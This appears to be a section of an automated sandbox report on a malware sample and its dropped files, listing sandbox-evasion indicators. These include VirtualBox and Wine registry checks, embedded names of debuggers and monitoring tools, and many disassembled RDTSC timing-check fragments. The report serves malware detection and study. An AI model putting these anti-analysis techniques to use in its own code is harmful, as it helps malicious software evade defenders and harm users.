        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: PROCMON.EXE
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: X64DBG.EXE
        Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000003.1703263673.0000000005100000.00000004.00001000.00020000.00000000.sdmp, vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SBIEDLL.DLL
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WINDBG.EXE
        Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WIRESHARK.EXE
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: DAA14B second address: DAA14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: DA99AA second address: DA99C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: DA99C3 second address: DA99C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1D771 second address: F1D784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1D784 second address: F1D794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007FB8E4E1A516h 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1D794 second address: F1D798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1DA27 second address: F1DA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FB8E4E1A526h 0x0000000b push edi 0x0000000c jmp 00007FB8E4E1A529h 0x00000011 jns 00007FB8E4E1A516h 0x00000017 pop edi 0x00000018 jne 00007FB8E4E1A518h 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1DE5F second address: F1DE64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1DE64 second address: F1DE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1DE75 second address: F1DE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1DE82 second address: F1DEA1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8E4E1A516h 0x00000008 jmp 00007FB8E4E1A520h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F2021C second address: F20263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push edi 0x0000000e jmp 00007FB8E4E1E3C8h 0x00000013 pop edi 0x00000014 jns 00007FB8E4E1E3BCh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007FB8E4E1E3B8h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20263 second address: F20268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F202EE second address: F20345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB8E4E1E3B8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 pushad 0x00000022 mov al, 05h 0x00000024 mov dword ptr [ebp+122D194Ah], eax 0x0000002a popad 0x0000002b push 00000000h 0x0000002d mov esi, dword ptr [ebp+122D197Fh] 0x00000033 call 00007FB8E4E1E3B9h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB8E4E1E3BCh 0x00000041 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20345 second address: F2034B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F2034B second address: F2036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8E4E1E3BDh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FB8E4E1E3BCh 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F2036D second address: F20377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB8E4E1A516h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20377 second address: F203A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnp 00007FB8E4E1E3C8h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 pop edx 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F203A3 second address: F20433 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8E4E1A51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FB8E4E1A528h 0x00000013 pop eax 0x00000014 je 00007FB8E4E1A51Bh 0x0000001a mov edi, 1C406B3Dh 0x0000001f push 00000003h 0x00000021 mov ecx, esi 0x00000023 mov di, 9930h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FB8E4E1A518h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov di, FB98h 0x00000047 push 00000003h 0x00000049 mov si, dx 0x0000004c call 00007FB8E4E1A519h 0x00000051 pushad 0x00000052 jmp 00007FB8E4E1A527h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20433 second address: F2046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b ja 00007FB8E4E1E3B6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jnl 00007FB8E4E1E3C0h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push esi 0x00000022 pushad 0x00000023 jmp 00007FB8E4E1E3BBh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F2046D second address: F2047D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F2047D second address: F204AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FB8E4E1E3BAh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop eax 0x0000000e mov cx, si 0x00000011 or dword ptr [ebp+122D2C31h], ebx 0x00000017 lea ebx, dword ptr [ebp+1244A137h] 0x0000001d mov edx, 0356EDE6h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jg 00007FB8E4E1E3B6h 0x0000002d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F204AF second address: F204B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F204B3 second address: F204B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20620 second address: F2062E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FB8E4E1A516h 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20789 second address: F20815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122D2F88h], ecx 0x00000010 call 00007FB8E4E1E3C1h 0x00000015 adc cx, 7DD6h 0x0000001a pop edi 0x0000001b push 00000003h 0x0000001d mov esi, dword ptr [ebp+122D2A3Fh] 0x00000023 mov dword ptr [ebp+122D2C31h], ecx 0x00000029 push 00000000h 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FB8E4E1E3B8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 call 00007FB8E4E1E3C7h 0x0000004c add di, 02A5h 0x00000051 pop edi 0x00000052 push ecx 0x00000053 mov si, 3831h 0x00000057 pop edi 0x00000058 push 5CE912DEh 0x0000005d push edi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20815 second address: F20819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F20819 second address: F2081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F2081D second address: F20860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 6316ED22h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB8E4E1A518h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 lea ebx, dword ptr [ebp+1244A14Bh] 0x0000002e sub dx, 1D48h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push edi 0x00000038 pop edi 0x00000039 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F33913 second address: F33919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F33919 second address: F3391D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F3391D second address: F33921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F42590 second address: F42596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F42596 second address: F425A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8E4E1E3BEh 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F425A8 second address: F425BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FB8E4E1A516h 0x0000000b jnp 00007FB8E4E1A516h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F425BE second address: F425C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F425C2 second address: F425C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F40465 second address: F4047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F405C7 second address: F405D4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4089A second address: F408AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnc 00007FB8E4E1E3B6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F408AF second address: F408B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F409CC second address: F409D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F40B43 second address: F40B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F40B48 second address: F40B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F40B4E second address: F40B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F40CBE second address: F40CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jne 00007FB8E4E1E3B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4110C second address: F41113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41113 second address: F41118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41118 second address: F41124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB8E4E1A516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4125A second address: F4125E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4125E second address: F41278 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1A521h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41278 second address: F4128A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BDh 0x00000009 popad 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4128A second address: F41292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41292 second address: F41296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41296 second address: F412A0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41725 second address: F41738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41738 second address: F4173C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41CAC second address: F41CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8E4E1E3C3h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41CC6 second address: F41CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41CE6 second address: F41CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41CEA second address: F41D11 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB8E4E1A529h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41D11 second address: F41D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3C4h 0x00000007 jns 00007FB8E4E1E3B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F41ED7 second address: F41EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4240C second address: F42428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1E3C8h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F444E2 second address: F44516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FB8E4E1A51Ch 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F44516 second address: F44524 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB8E4E1E3B6h 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F44A5E second address: F44A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F44A64 second address: F44A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jnl 00007FB8E4E1E3CAh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F44D11 second address: F44D1B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F44D1B second address: F44D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB8E4E1E3B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4E056 second address: F4E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
